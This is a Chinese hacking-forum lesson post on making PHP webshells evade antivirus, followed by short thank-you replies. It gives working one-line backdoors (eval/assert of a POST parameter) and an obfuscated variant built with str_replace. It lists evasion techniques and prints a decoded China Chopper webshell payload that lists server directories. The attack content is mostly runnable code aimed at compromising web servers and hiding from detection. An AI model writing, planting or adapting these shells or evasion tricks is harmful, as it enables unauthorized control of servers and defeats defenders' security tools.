HACK80 首页  立即注册  登录
现在注册
已注册用户请  登录
HACK80    视频教程

三期公开课第21节-webshell免杀相关问题

  •   宝宝 ·2018-1-1 01:34:03·14698 次点击 ·阅读模式     

    马上注册,加入HACK80!与我们一起交流。

    您需要 登录 才可以下载或查看,没有帐号?立即注册

    x
    截图:
    21.PNG

    21ppt.PNG

    播放地址
    游客,如果您要查看本帖隐藏内容请回复

    文字说明:

    二十一:webshell免杀相关问题
    我们一直致力于信息安全培训服务!

    HTTP://WWW.HACK80.COM


    分析一句话是如何工作的
    1. <div>
    2. </div><div><?php @eval ($_POST[‘pass’];)?></div>
    复制代码




    Eval=assert


    分析菜刀是如何工作的

    通过抓包中国菜刀webshell管理工具来分析菜刀是如何工作的


    免杀shell的过程

    关键字污染
    替换更改函数
    猜分组合
    编码加密
    函数调用


    例子:
    1. <?php $a = str_replace(x,"","axsxsxxexrxxt");$a($_POST[“pass"]); ?>
    复制代码

    1. <div>
    2. </div><div><?php assert($POST[‘PASS’]);?></div>
    复制代码



    尝试免杀


    1.表面免杀
    2.行为免杀









    解密前:

    1. pass=@eval(base64_decode($_POST[z0]));&z0=QGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIiwiMCIpO0BzZXRfdGltZV9saW1pdCgwKTtAc2V0X21hZ2ljX3F1b3Rlc19ydW50aW1lKDApO2VjaG8oIi0%2BfCIpOzskRD1iYXNlNjRfZGVjb2RlKCRfUE9TVFsiejEiXSk7JEY9QG9wZW5kaXIoJEQpO2lmKCRGPT1OVUxMKXtlY2hvKCJFUlJPUjovLyBQYXRoIE5vdCBGb3VuZCBPciBObyBQZXJtaXNzaW9uISIpO31lbHNleyRNPU5VTEw7JEw9TlVMTDt3aGlsZSgkTj1AcmVhZGRpcigkRikpeyRQPSRELiIvIi4kTjskVD1AZGF0ZSgiWS1tLWQgSDppOnMiLEBmaWxlbXRpbWUoJFApKTtAJEU9c3Vic3RyKGJhc2VfY29udmVydChAZmlsZXBlcm1zKCRQKSwxMCw4KSwtNCk7JFI9Ilx0Ii4kVC4iXHQiLkBmaWxlc2l6ZSgkUCkuIlx0Ii4kRS4iCiI7aWYoQGlzX2RpcigkUCkpJE0uPSROLiIvIi4kUjtlbHNlICRMLj0kTi4kUjt9ZWNobyAkTS4kTDtAY2xvc2VkaXIoJEYpO307ZWNobygifDwtIik7ZGllKCk7&z1=RDpcXHdhbXBcXHd3d1xcc2FmZVxc
    复制代码





    解密后:
    1. <div>pass=@eval(base64_decode($_POST[z0]));&z0=@ini_set("display_errors","0");@set_time_limit(0);@set_magic_quotes_runtime(0);echo("->|");;$D=base64_decode($_POST["z1"]);$F=@opendir($D);if($F==NULL){echo("ERROR:// Path Not Found Or No Permission!");}else{$M=NULL;$L=NULL;while($N=@readdir($F)){$P=$D."/".$N;$T=@date("Y-m-d H:i:s",@filemtime($P));@$E=substr(base_convert(@fileperms($P),10,8),-4);$R="\t".$T."\t".@filesize($P)."\t".$E."</div><div>";if(@is_dir($P))$M.=$N."/".$R;else $L.=$N.$R;}echo $M.$L;@closedir($F);};echo("|<-");die();z1=D:\\wamp\\www\\safe\\</div>
    复制代码







    14698 次点击  
    收藏  转播  分享
    30 回复
      Reply  
    宝宝  2018-1-1 01:34:36 
    以后课程估计由我发的概率大些,老大比较忙{:4_127:}
      Reply  
    套套不绝  2018-1-1 13:01:14 
    宝哥辛苦!
      Reply  
    root  2018-1-1 20:52:45 
    前排支持!nn
      Reply  
    johnsmith  2018-1-5 11:25:14 
    thank you thank you
      Reply  
    citizenxyc  2018-1-7 15:23:00 
    谢谢分享,学习学习
      Reply  
    citizenxyc  2018-1-7 15:24:36 
    视频看不了啊
      Reply  
    xx20172017  2018-1-7 21:12:08 
    感谢  分享
      Reply  
    心魂圣王  2018-1-10 16:13:28 
    看看,学习学习
      Reply  
    309475523  2018-1-13 13:21:33 
    十分感谢,辛苦了。
    12345下一页
    添加一条新回复
    您需要登录后才可以回帖 登录 | 立即注册

    本节点积分规则
    QQ
    小黑屋   ·   手机版   ·   170 人在线 最高记录 5500   ·   TOP
    我们很年轻,但我们有信念、有梦想!

      我们坚信只有今天付出了,才有机会看到明天的太阳!现在!加入我们,给你一个气氛优秀的技术圈子。  
    GMT+8, 2018-6-22 15:18, Processed in 0.050152 second(s), 22 queries .